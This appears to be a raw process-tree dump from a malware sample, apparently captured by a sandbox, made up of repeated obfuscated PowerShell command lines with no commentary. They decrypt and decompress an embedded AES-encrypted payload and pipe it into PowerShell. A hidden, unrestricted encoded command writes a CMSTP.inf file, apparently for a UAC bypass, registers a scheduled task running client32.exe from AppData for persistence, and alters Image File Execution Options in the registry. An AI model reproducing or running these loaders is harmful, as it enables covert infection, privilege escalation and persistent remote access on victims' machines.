FmyNzi1AiHOebecIjy97rI5jlMF1OldZFVo0uk1hhKxnaTFk7eMq45BsDsNZPaumaCbecYpAVlEtSdsx98tPHbZ3ysYTG9A/ooejgSSLcLvFXjNYKUF36biCkhsLzHz6hUz9/Mb56eOBW/0u43L4UYH60styVu2GcUA8eoBSB8RpZs26W3boUMgndpD529JKLQhcRd4tVP+DfW/n0W5ivyqtRbP24B1l0V6YTH6v//RYPjvb9wNRQtWRFFQD9tax8K/ejY4Ijv5Tfjt/iGuObaqR3xZbkKWtxl6L8vYY6M4ym1U/uLFFqZCK6yPHgo3OiKrQjDy5H2NCX08qGIihRhwVgp0AsLJ3jbcVaucCIP+pb/ccGSPqiHFOcnYsKvBw9XDkE5ugqBPxYB0uCNcX2KRzc57KAOBS9DB+pPOBf13XrQIlDcb1dpIsTzDhX651PzBp1B4VXaJD7OtQdgfIkfhabJ/7QA+TyjHG+q7KZRFLRlWahTMRayEH0FhAGosXrSBnywhWBQAGTfhlrvZUZIbjQvqhHkQlYcCOEnlFL0W9Z3Is2OR8az8HW+b2ISkOZvp';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $uGSyEn = 'AAAAAAAAAAAAAAAAAAAAAPJlV3B1NhOYx3YVPpROLxNgaqL3qbdqyDshP+EuM5BY9U8ASIdSQGeEapX4ZZq7MccZfiZsI5TOvL/mZyPW+LsKs+zH8Xaw0XTtBFHBZeSWSHL5/q0MMmgIupTCSCfAg3u5vX5SH/4/1JZrK64q9gOJG5U3WXxsCd5fNkp9lxqQu9/Ke6QzKyXVADPmAXkzGyX4uUFQwTZKLjhzI16nB8fCYrFkEKZa7KVY68MiJMgAjG2yzQ4/DGStADYNF6DA0xDhemQLqlq8oDHDp114wKw390YCnP8OOPtTWb7Jxy33NLqzS5smWNQXVbMlZonbIbk4HTvfcBaaknbmSgIyY9myxQ0nhCeNNRYPNnnQWi+9Nv8b672212xu8rK7zM5ELy8w7kTdQJq0iwS2e5FiCmBBvwM6ja3Wi/VLULGk2nS8qbiTnNWzq3W6thTfTgDPpRL5wSg9XybFluV502aH1b1mbHToRQVWcOB+MtuaiGGmztKTWGN7pj+pHng97kl0vACDSWiC2zvS3nsucGBiM+yVWe2Jc1jejGTnT84tVcTKr/k4UJy2Dj3mz/K53w/8RMlNqMG0QPrGNlq1vvYMt1imL4+rNH49Vgr/wJAGNewpLiRSnLeiLws7lg8NQ2lChltLoK80QjU0/wgrtEmfzbcMigmkxHUlgiSIv9+MqvEuMnA8PqtOt/hHoi9O1zcmTkBsVyDbv3x02zAc8s5QYuNXrj2l+VXCwfWJgS/cyd1XRNCKKo/HzwlKgHycr15LiegLsh1vn5JGHgsiydTbBEHZMf8A/2dORoe/sL02oebQtEzzP2l+hqVP0hvhLaFuQfpg/6gTAlHHmeG5sSfXybeQgnsQFgnU/P7T9saaD6xhAjTpacIIohCdGRurCMPomSiLx2E+PZfCQJt9wN/MBtMXyMNp8Ap3xhxEEej4vYCjoNq0bHciaivvMOZnjVLfmxRBlpkGbIm/7iE/43Bgl2hj9evceUBKPUHOjJF29jSp1oIr6jJGcoUVXLLfuAXEvrSGmc0kxajGHw5tNkQ8xsg40qvp5ToXmuLz8xyjn0MZhLBh9iqlo+Ww/K7jAW2c6/U4RTO8FXtkFN3yaqYECTAawuwdYJrpEzBCnIiUBtVYItgPQYJ3+Rqh/i8x5lxireJFPJt1o9LoYGNli+HMazc0xjyI7cEE+eEbI+jicXVRy7noLNNKdSw8eh8eYqA5sjJQM2Nu6NGN/dRC+vFEzzxOaYVNR/Dl+7LZ1dsq0SKMqasNRLIJCUiW54ZLiFAjGJRN+3MZe38YE2KSEQaEcrcbH2/mHN0l0cY4Yuh34l8MkdbF+1DpFhAWtawBaVRJcJX1fjUG4Fd5oF2HqfQ1QpnGe9t9f12r5k4zkuidjH9fRoYNptt+IYPaOgXhlcg04iGrhE6/x5r4PT9x/1WDKIFnbgvXqw0LK7yGQRe+Qm0X8FDmfBkrqeKIEig4kITCnT6dyTu73InuFskasdGiov5Oxib3+Jy7L/A3r1vSnCIQfd3yzsRaxfj4JPjVWCOYONiNw5KOKqNoFrZlhuphQkn+ECqpABKTisjzCRwVb+g2D4uNe3pEybbAVa0d9yCKlhivKXIsgbcZZfEVnONk76wzrCD9FXY6/ZdNmUvqd1J0rMDPtiqpGuYfwOPhlkEfamNhx7r48pW2BZLhV61klwDb+5UXlyhcyz4PdOlOE+YVP/CoXm7eYad92E52MQPOMqatGBUX6Br0E0gqYzTXA+ttV3dSPn0Vlhv2SxrVuimlZU9Z6qeiSHiNg50t5s2nRUti+/j/mxJqyNHfERBvrMJe+biesmgiM530+uHMbKKzv784nEgISu7qe4+fZknfBhT1VQmEUXtLhitB3wtyQ6DqxRPpjZ22wcIkBpaUlsK+1APrve/AdE/G7yAnLUWuxOIZpsk7X4eMfd7nvZYRJ3acYIXL3HWKRI88F6eYl3Ins2vPnYDbV3F0FX6XbTqdDYCvdy62/NgWs02bDdBevko2tt1UtcG0hYutuOgbZ5hRBgptVGJ4AUuTP3bwz3pwnj2vV31sHuqsWjPW9ANthuoWx5xNjbp5bMcF7WHsOmAsccFWVlBKUyH9b2VL44huVrmKT9N182utrWTzCuQe5OG6tPdfQ5A8VPIOs6TS/qhZ0R/l7Fg1COr5eEyJnzYoqHF16Nk60O5EOBo9+T/RrwMzwuQnFtA3AIC45pBrHkOxH4PB1M9MqPRFJOXn5fAIXLmmauoC/SQ7tmY/55eaps0Fi+K48B+4tVWPXoj1yQTDUiPAOpOYOxqGL1Ma5lRKNAdZrXwi64S6zN2sgO0grqSR+OVrXSyuHU3zE75CQzKL0NyFtqotzPPITyAYWWVMKQZjCrAzB+jxcJkGTLI+b3fjXxnae8UIQsli0ZJW+FGTst9NXCUZ9xhvgnCUGu2PjLj8uDGmlnnC7W3m1jV6E8mAVT5/kKqfayDFfT9KcNO2sINm/Bszhb7nSGsGBydHBcm/zdVwX+QwIOob2r3c5KTk1TYGpZwQ4Wmaqw21P+9XS0f46Q+vPKoe2Uqn6m39ch8WXEfYK0YeDSxaX9vDXdBCG1jHKBUKBpr8lsmgUMYv+XFQyP+9PFkeQubE4TxWcRIhchDe22d2+0R+GmXx8LBgrq2+4ZoDkNnD9/ThD269G255Q8KE76Z/xAoPr+JCFGiplU/Y4ZEW9WQfcK/56qyl3qWD8rZgo+tpaKHcWI4Rz47W56LO7nmGKdy5hZ1Yv5JQ+Mzm6T9qhZWBrRvOShwRB37EK1Qk4ulSkZBks4sbk4b1+eaQDrTZNlCdDqAYPuRgg+tci2Re+kj0nJX4qS8K6g0Nd1Ea0Aqd/VRyKMeZbxVakjm4swRJWDvfeAZCO1wi8ldRBOjISvLwrbGkZ6RCgHdrmT9dh9TVNMUX997skUsrRyq1g9I6rbRtGs9ze/9aZKHMJEXNsQAz3crUgVXSmNYm/zVpPK/zZkAid9KOg8yO3bdDXLzTNZ12QtX+sfeZQWrT6bh0t3Wvz0R+wpEjhw86LgrJvu8ATsT0rnz0LpLDixbcsf0UWND0D4Vtzum2LNJInbjx5rOZqqZkRbUQI4UgWMzXhOJUdH61bD+mQFjksH6tyuTOMDrxDCwwnJSZ6kV83Qq0BmTzHYdRMC4FjPOod1QsfsLy4uYmaAtBYmX5d0CBPXdGQJY+d16fAkiS4EEq71SBo1+MlEhjODiT4DoN4f5AJn67jyDA4cnE5ly8LyvMLRnj6p7mO/F6wClJJ1CDNOyOGOpOSocM8Jng1hfCxtfLZUioyP4Lhd0vdtR/b+y6DRLOY9wJdigYsiEz1h6lWwm6fW0IYz5FefsFbJ+sPX+fH3BC1Jse4p0w4pBj8ziqRRaxAxlUdhBKRPfGuZU0EIIWoSIPnQwuh0aRD5jyq99CiaV0Gzq5HVDIrQ3LbUOF7VSmmsVv1ON8TESZ8fs13bScVJmkcYGpXsoP8iJLeBigIZh2synd/TLxyCo+kcnRjg5QXDbfW9rk45uy49UFlKd25+ulQjPZNSRkhKJMgrhT3thzCFCuURy6f/0DJMTBbadn2/rmixiX+7eFYwoZP4yaqgy3MNNvrN/NM3qHUkOAi65UnxZOyHpv6Oyb2O8iI8PTMFubKKhGL6ojHZgVC7V4cIOcp0izBUyRZj2H9aL1A6RQQIr4iy6i54EYVvgHDTkhgejoPcLd4pkpWjsZh0/cAnb8Y26EuPY+H9i1gJtUtI/Ih/5whUgWJdaBf+X9p1g8D98DLeLV4BlCe1Qz1OvtKCITeFX0HFIjMdEbVQZWIawvBGwfJFmyNzi1AiHOebecIjy97rI5jlMF1OldZFVo0uk1hhKxnaTFk7eMq45BsDsNZPaumaCbecYpAVlEtSdsx98tPHbZ3ysYTG9A/ooejgSSLcLvFXjNYKUF36biCkhsLzHz6hUz9/Mb56eOBW/0u43L4UYH60styVu2GcUA8eoBSB8RpZs26W3boUMgndpD529JKLQhcRd4tVP+DfW/n0W5ivyqtRbP24B1l0V6YTH6v//RYPjvb9wNRQtWRFFQD9tax8K/ejY4Ijv5Tfjt/iGuObaqR3xZbkKWtxl6L8vYY6M4ym1U/uLFFqZCK6yPHgo3OiKrQjDy5H2NCX08qGIihRhwVgp0AsLJ3jbcVaucCIP+pb/ccGSPqiHFOcnYsKvBw9XDkE5ugqBPxYB0uCNcX2KRzc57KAOBS9DB+pPOBf13XrQIlDcb1dpIsTzDhX651PzBp1B4VXaJD7OtQdgfIkfhabJ/7QA+TyjHG+q7KZRFLRlWahTMRayEH0FhAGosXrSBnywhWBQAGTfhlrvZUZIbjQvqhHkQlYcCOEnlFL0W9Z3Is2OR8az8HW+b2ISkOZvp';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAB1AG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAIAAiACAAVQBnAEIARgBBAEUAYwBBAEkAQQBCAEIAQQBHAFEAQQBaAEEAQQBnAEEAQwBJAEEAUwBBAEIATABBAEUAVQBBAFcAUQBCAGYAQQBFAE0AQQBUAEEAQgBCAEEARgBNAEEAVQB3AEIARgBBAEYATQBBAFgAdwBCAFMAQQBFADgAQQBUAHcAQgBVAEEARgB3AEEAUQB3AEIATQBBAEYATQBBAFMAUQBCAEUAQQBGAHcAQQBlAHcAQQAyAEEARABRAEEATgBRAEIARwBBAEUAWQBBAE0AQQBBADAAQQBEAEEAQQBMAFEAQQAxAEEARABBAEEATwBBAEEAeABBAEMAMABBAE0AUQBBAHcAQQBEAEUAQQBRAGcAQQB0AEEARABrAEEAUgBnAEEAdwBBAEQAZwBBAEwAUQBBAHcAQQBEAEEAQQBRAFEAQgBCAEEARABBAEEATQBBAEEAeQBBAEUAWQBBAE8AUQBBADEAQQBEAFEAQQBSAFEAQgA5AEEARgB3AEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBGAHcAQQBiAHcAQgB3AEEARwBVAEEAYgBnAEIAYwBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEASQBnAEEAZwBBAEMAOABBAFoAZwBBAGcAQQBDADgAQQBkAGcAQgBsAEEAQwBBAEEATAB3AEIAMABBAEMAQQBBAFUAZwBCAEYAQQBFAGMAQQBYAHcAQgBUAEEARgBvAEEASQBBAEEAdgBBAEcAUQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBWAEEASABNAEEAWgBRAEIAeQBBAEgATQBBAFgAQQBCAEIAQQBHAFEAQQBiAFEAQgBwAEEARwA0AEEAWABBAEIAQgBBAEgAQQBBAGMAQQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVQBnAEIAdgBBAEcARQBBAGIAUQBCAHAAQQBHADQAQQBaAHcAQgBjAEEARQBrAEEAYgB3AEIAdQBBAEcAawBBAFkAdwBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARwBJAEEAWQBRAEIAdQBBAEcAUQBBAFgAQQBCAGoAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAegBBAEQASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQA3AEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBGAE0AQQBZAHcAQgBvAEEARwBVAEEAWgBBAEIAMQBBAEcAdwBBAFoAUQBCAGsAQQBGAFEAQQBZAFEAQgB6AEEARwBzAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAFUAQQBJAEEAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBCAEEARwBRAEEAYgBRAEIAcABBAEcANABBAFgAQQBCAEIAQQBIAEEAQQBjAEEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFUAZwBCAHYAQQBHAEUAQQBiAFEAQgBwAEEARwA0AEEAWgB3AEIAYwBBAEUAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQgBDAEEARwBFAEEAYwB3AEIAbABBAEcASQBBAFkAUQBCAHUAQQBHAFEAQQBYAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHoAQQBEAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAcABBAEQAcwBBAEoAQQBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVQB3AEIAagBBAEcAZwBBAFoAUQBCAGsAQQBIAFUAQQBiAEEAQgBsAEEARwBRAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAEwAUQBCAEIAQQBIAFEAQQBUAEEAQgB2AEEARwBjAEEAVAB3AEIAdQBBAEQAcwBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMAMABBAFUAdwBCAGoAQQBHAGcAQQBaAFEAQgBrAEEASABVAEEAYgBBAEIAbABBAEcAUQBBAFYAQQBCAGgAQQBIAE0AQQBhAHcAQQBnAEEAQwAwAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAE8AQQBHAEUAQQBiAFEAQgBsAEEAQwBBAEEASQBnAEIAQwBBAEcARQBBAFkAdwBCAHIAQQBHAGMAQQBjAGcAQgB2AEEASABVAEEAYgBnAEIAawBBAEUATQBBAGEAQQBCAGwAQQBHAE0AQQBhAHcAQQBpAEEAQwBBAEEATABRAEIAQgBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQBrAEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQB0